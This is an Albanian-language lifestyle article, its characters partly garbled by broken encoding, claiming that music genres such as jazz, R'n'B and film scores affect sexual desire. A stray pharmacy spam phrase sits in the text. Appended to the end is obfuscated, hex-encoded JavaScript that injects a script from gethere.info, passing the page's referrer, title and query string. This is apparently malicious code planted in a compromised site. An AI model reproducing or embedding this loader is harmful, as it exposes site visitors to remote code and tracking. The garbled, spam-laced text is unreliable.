f.1122062908359_m

A�farA� do tA� jetA� seksi e pA�rcakton edhe lloji i muzikA�s

prevacid availability. Pas seksit dhe ushqimit tA� mirA�, muzika ndikon mirA� te njerA�zit, e arsye A�shtA� lirimi i kemikaleve qA� janA� pA�rgjegjA�se pA�r disponim tA� mirA�.

Shekspiri ka shkruar se muzika A�shtA� ushqim i dashurisA�, e nuk ishte i vetmi qA� dashurinA� dhe seksin i kishte ndA�rlidhur me muzikA�n. Muzika krijon pA�rjetim romantik, sepse fjalA�t e kA�ngA�s zgjojnA� imagjinatA�n, ndA�rsa ritmi ndikon nA� lA�vizje t qA� bA�ni.

Shijet e muzikA�s janA� tA� ndryshme, por te shumica e njerA�zve mA� se miri kalon muzika e filmave. Ndoshta sepse na pA�rkujton nA� skena seksi dhe romantike nga filmat.

ShumicA�s sA� njerA�zve u pA�lqen muzika me ritmin e tA� rrahurave tA� zemrA�s. Pos muzikA�s, edhe tingujt e oqeanit zgjojnA� dA�shirA�n seksuale, sidomos te femrat, tA� cilat nA� tingujt e tillA� ndihen mirA� dhe tA�rheqA�se brenda vetes sA� tyre.

Sipas hulumtimeve, adhuruesit e muzikA�s xhaz mA� sA� shumti praktikojnA� seksin, ndoshta arsye A�shtA� zA�ri erotik i saksofonit.

Muzika R’n’B A�shtA� e pA�rsosur pA�r mbrA�mje sensuale dhe pA�r dashuri tA� ngadaltA�. Sipas mendimit tA� shumicA�s sA� femrave dhe tA� meshkujve, muzika metal A�shtA� tingulli i fundit qA� do tA� dA�shironin ta dA�gjonin. Kjo muzikA� sipas hulumtimeve nervozon dhe zemA�ron njerA�zit.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}